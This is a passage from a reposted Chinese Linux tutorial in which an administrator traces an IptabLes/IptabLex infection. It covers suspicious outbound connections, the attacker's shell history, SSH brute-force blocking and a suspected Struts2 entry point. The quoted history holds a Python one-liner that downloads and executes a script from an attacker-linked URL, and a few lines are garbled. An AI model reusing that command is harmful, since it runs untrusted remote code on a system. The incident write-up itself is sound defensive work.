纯净之家 > Linux教程

小记IptabLes和IptabLex病毒清理过程(3)

更新日期:2021-10-15

来源:纯净之家


系统大全为您提供
 
 

通过netstat -anput 发现这个进程的功能应该是    TCP 这里是我的IP:59978->66.102.253.30:dvr-esm (SYN_SENT)。
tcp        0      1 这里是我的IP:41939       222.34.129.154:2804         SYN_SENT    1701/bash
这尼玛好像就是反弹shell吧。
还是看看.bash_history吧。
    973 find -name '*tomcat*'
    974 find -name 'index.jsp'
    975 ------------------------------
    976 find -name 'index.jsp'
    977 ls
    978 top
    979 ls
    980 python -c "exec(__import__('urllib').urlopen('https://www.yascanner.com/0c971e54b1eef79a').read())" -m 50
    981 python2
    982 python
    983 ls
    984 wget https://www.python.org/ftp//python/2.7/Python-2.7.tar.bz2
    985 wget www.baidu.com
    986 cat index.html
    987 wget https://www.python.org/ftp//python/2.7/Python-2.7.tar.bz2
    988 wget https://www.python.org/ftp//python/2.7/Python-2.7.tar.bz2 --no-check-certificate
    989 ls
    990 tar -jxvf Python-2.7.tar.bz2
    991 cd p
    992 cd Python-2.7/
    993 dir
    994 ./configure
    995 make
    996 make install
    997 python -c "exec(__import__('urllib').urlopen('https://www.yascanner.com/0c971e54b1eef79a').read())" -m 50
    998 python -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/0c971e54b1eef79a').read())" -m 50
    999 pip
   1000 yum install python-zlib
他先安装了python,然后去那个URL下了个脚本,网站看了下,是个hack网站,那就是提权和做后门了吧。想再看看还有什么的时候发现只能保存1000行!!!!!
tail –100 

ar/log

cure
看看安全信息,有公网IP拼命的在尝试root的密码,而且走的是ssh进来的。当然关闭ssh相信应该是可以的。我这因为目前公网上还需要用到ssh,所以只能在hosts.deny上进行阻止该公网IP进来。
 
  东北大学网络中心有常见的ssh攻击的IP地址,及一个sh脚本:
  网址:http://antivirus.neu.edu.cn/scan/ssh.php
阻止别人的ssh连接了,但是内部的 那个进程还是一直有,一直发着这个
TCP 这里是我的IP:59978->66.102.253.30:dvr-esm (SYN_SENT)
他应该用的应该是Struts2的漏洞进入服务器里的,但是留下的那个后门,我现在还没有办法解决,
Struts2的漏洞可以看这里:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
至此,先到这里吧。最近还是再看看吧。 
  
  以上就是系统大全给大家介绍的如何使的方法都有一定的了解了吧,好了,如果大家还想了解更多的资讯,那就赶紧点击系统大全官网吧。 
 
本文来自系统大全http://www.win7cn.com/如需转载请注明!推荐:win7纯净版